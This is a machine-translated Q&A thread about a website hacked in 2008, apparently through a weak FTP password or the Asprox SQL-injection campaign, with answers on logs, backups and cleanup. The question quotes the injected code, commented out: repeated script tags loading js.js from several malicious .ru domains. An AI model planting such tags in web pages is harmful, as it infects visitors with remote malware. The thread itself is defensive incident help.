Мой сайт был взломан .. Что я должен делать?

голоса
18

Мой папа позвонил мне сегодня и сказал, что люди собираются на его сайт получали 168 вирусов, пытающихся загрузить на свои компьютеры. Он не технический вообще, и построил все это с редактором WYSIWYG.

Я просунул сайт открыт и осматривал источник, и там была линия Javascript включает в нижней части источника прямо перед закрывающим HTML тега. Они включили этот файл (среди многих других): http://www.98hs.ru/js.js <- ВЫКЛЮЧИТЬ JAVASCRIPT , прежде чем идти ТОТ URL.

Так что я заметил это сейчас. Оказывается, его FTP пароль был простым словарным слово длиной шесть букв, поэтому мы считаем, что, как это было взломано. Мы изменили свой пароль на 8+ значных без слов (он не будет идти на ключевую фразу, так как он является охота машинки-н-пек).

Я сделал WHOIS на 98hs.ru и нашел , что это размещается с сервера в Чили. Существует на самом деле адрес электронной почты , связанный с ним, но я серьезно сомневаюсь , что этот человек является преступником. Наверное , просто какой - то другой сайт , который был взломан ...

Я понятия не имею, что делать в этот момент, хотя, как я никогда не имел дело с такого рода вещи раньше. Кто-нибудь есть какие-либо предложения?

Он использовал обычный джане ун-защищенное FTP через webhost4life.com. Я даже не вижу способ сделать SFTP на своем сайте. Я думаю , его имя пользователя и пароль был перехвачен?

Таким образом, чтобы сделать это более актуально для сообщества, какие шаги следует предпринять / лучшие практики вы должны следовать, чтобы защитить свой сайт от получения взломали?

Для записи, здесь есть строка кода, который «магически» получил добавил в свой файл (и не в его файл на своем компьютере - я оставил его закомментирована просто сделать абсолютное, что он не будет делать ничего на этой странице, хотя я уверен, что Джефф бы защититься от этого):

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
Задан 06/08/2008 в 00:55
источник пользователем
На других языках...                            


8 ответов

голоса
3

С символьного пароля в шесть слов, возможно, он был вынужден скотина. Это более вероятно, чем его FTP перехвата, но это может быть, тоже.

Начните с более сильным паролем. (8 символов по-прежнему довольно слабый)

Смотрите , если это ссылка на интернет - блог безопасности полезно.

Ответил 06/08/2008 в 01:00
источник пользователем

голоса
13

Постарайтесь собрать как можно больше информации, как вы можете. Смотрите, если хозяин может дать вам журнал с указанием всех FTP-соединения, которые были сделаны на ваш счет. Вы можете использовать их, чтобы увидеть, если это было даже соединение FTP, который был использован, чтобы сделать изменения и, возможно, получить IP-адрес.

Если вы используете набитое программное обеспечение, как Wordpress, Drupal, или что-нибудь еще, что вы не закодировать может быть уязвимостями в коде загрузки, что позволяет для такого рода изменений. Если специально построен, дважды проверьте все места, где позволяют пользователям загружать файлы или изменять существующие файлы.

Второе, что было бы взять дамп сайта как есть, и проверить все для других модификаций. Это может быть просто одна модификации они сделали, но если они попали в через FTP, кто знает, что еще там.

Откат вашего сайта назад к известному статусу и, в случае необходимости, обновить его до последней версии.

Существует уровень доходности, вы должны принять во внимание тоже. Является ли повреждение стоит пытаться отслеживать человека вниз или это что-то, где вы просто жить и учиться и использовать сильные пароли?

Ответил 06/08/2008 в 01:16
источник пользователем

голоса
2

Является ли сайт просто статический HTML? то есть он не сумел закодировать себя страницу загрузки, которая позволяет никому вождение по загружать скомпрометированы скрипты / страницы?

Почему бы не спросить webhost4life, если у них есть какие-либо журналы FTP доступны и сообщить о проблеме им. Вы никогда не знаете, они могут быть весьма восприимчивы и выяснить для вас именно то, что случилось?

Я работаю совместно хостера, и мы всегда приветствуем отчеты, такие как эти, и, как правило, точно определить вектор атаки на основе и сообщить о том, где клиент не заладилось.

Ответил 06/08/2008 в 01:24
источник пользователем

голоса
5

Вы упоминаете ваш папа использовал инструмент веб-публикации.

Если инструмент публикации публикует от своего компьютера на сервер, может быть так, что его локальные файлы чистые, и что ему просто нужно переиздать на сервер.

Он должен увидеть, если есть другой способ Войти в свой сервер, чем обычный FTP, хотя ... это не очень безопасно, потому что он посылает свой пароль в незашифрованном виде через Интернет.

Ответил 06/08/2008 в 04:31
источник пользователем

голоса
14

Я знаю, что это немного поздно в игре, но URL упоминается JavaScript упоминается в списке сайтов известных была частью бот-всплеск ASPRox, который начался в июне (по крайней мере, когда мы получали помечается Это). Некоторые подробности об этом приведены ниже:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

Неприятная вещь об этом является то, что эффективно каждым VARCHAR поле типа в базе данных «заражено» выплюнуть ссылку на этот URL, в котором браузер получает крошечный IFRAME, который превращает его в бот. Базовый SQL исправить это можно найти здесь:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

Страшная вещь, хотя в том, что вирус ищет в системных таблицах для значений заражать и много общих планов хостинга также имеют место на диске для своих клиентов. Так что, скорее всего, это был сайт даже не твой отец, который был заражен, но сайт кто-то в его хостинге кластера, который написал бедный код и открыл дверь в SQL Injection атаки.

Если он еще не сделали этого, я бы отправить СРОЧНУЮ электронную почту хозяин и дать им ссылку на этот SQL код, чтобы исправить всю систему. Вы можете исправить свои собственные затронутые таблицы базы данных, но, скорее всего, боты, которые делают инфекцию собираются пройти прямо через это отверстие снова и заразить всю партию.

Надеюсь, что это дает вам некоторую информацию для работы.

EDIT: Еще один быстрый мысль, если он использует один из хостов онлайн инструментов проектирования для создания своего веб-сайта, все это содержание, вероятно, сидит в колонке и был заражен таким образом.

Ответил 07/08/2008 в 23:49
источник пользователем

голоса
-1

Мы были взломаны с теми же ребятами видимо! Или боты, в нашем случае. Они использовали инъекцию SQL в URL на некоторых старых классических сайтах ASP, что никто не поддерживает больше. Мы нашли атакующие IP-адреса и блокировали их в IIS. Теперь мы должны реорганизовать все старые ASP. Итак, мой совет, чтобы взглянуть на журналы первой IIS, чтобы найти, если проблема заключается в конфигурации кода сервера или сайта.

Ответил 16/08/2008 в 17:35
источник пользователем

голоса
0

Отключите веб-сервер, не закрывая его вниз, чтобы избежать отключения скриптов. Анализ жесткого диска через другой компьютер в качестве привода данных и посмотреть, если вы можете определить виновник через лог-файлы и вещи такого рода. Убедитесь в том, что код является безопасным, а затем восстановить его из резервной копии.

Ответил 26/09/2008 в 21:12
источник пользователем

голоса
0

Это случилось с моим клиентом недавно, который был размещен на Ipower. Я не уверен, если ваш хостинг среда была основана Apache, но если бы это было обязательно перепроверить для .htaccess файлов, которые вы не создавали, в частности, над вебсервер и внутри каталоги изображений, так как они, как правило, вводят некоторые гадости там а также (они были перенаправлять людей в зависимости от того, откуда они пришли в см). Также проверьте, что какой-либо ты создать код, который вы не писали.

Ответил 26/09/2008 в 21:21
источник пользователем

Cookies help us deliver our services. By using our services, you agree to our use of cookies. Learn more